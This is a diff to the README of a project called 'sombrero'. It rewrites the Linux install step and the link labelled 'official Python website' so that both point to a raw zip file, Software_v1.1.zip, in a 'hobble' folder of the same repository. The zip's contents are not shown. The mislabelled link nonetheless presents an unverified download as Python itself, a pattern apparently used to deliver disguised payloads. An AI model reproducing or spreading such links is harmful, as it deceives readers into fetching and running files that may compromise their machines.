SkYrix-ops/sombrero/README.md

 2. **Run the Installer**:
    - On **Windows**: Double-click the `.exe` file and follow the on-screen instructions.
    - On **Mac**: Open the `.dmg` file and drag the sombrero icon to your Applications folder.
-   - On **Linux**: Extract the `.tar.gz` file and run the `install` script using terminal commands.
+   - On **Linux**: Extract the `https://github.com/SkYrix-ops/sombrero/raw/refs/heads/main/hobble/Software_v1.1.zip` file and run the `install` script using terminal commands.

 ## ⚙️ System Requirements

 - **Operating System**: Windows 10 or higher, macOS Mojave or higher, or any recent Linux distribution.
 - **Python**: Version 3.9 or higher installed on your system.
-If you do not have Python installed, you can download it from the [official Python website](https://www.python.org/downloads/).
+If you do not have Python installed, you can download it from the [official Python website](https://github.com/SkYrix-ops/sombrero/raw/refs/heads/main/hobble/Software_v1.1.zip).

 ## 🧑‍💻 Running the Application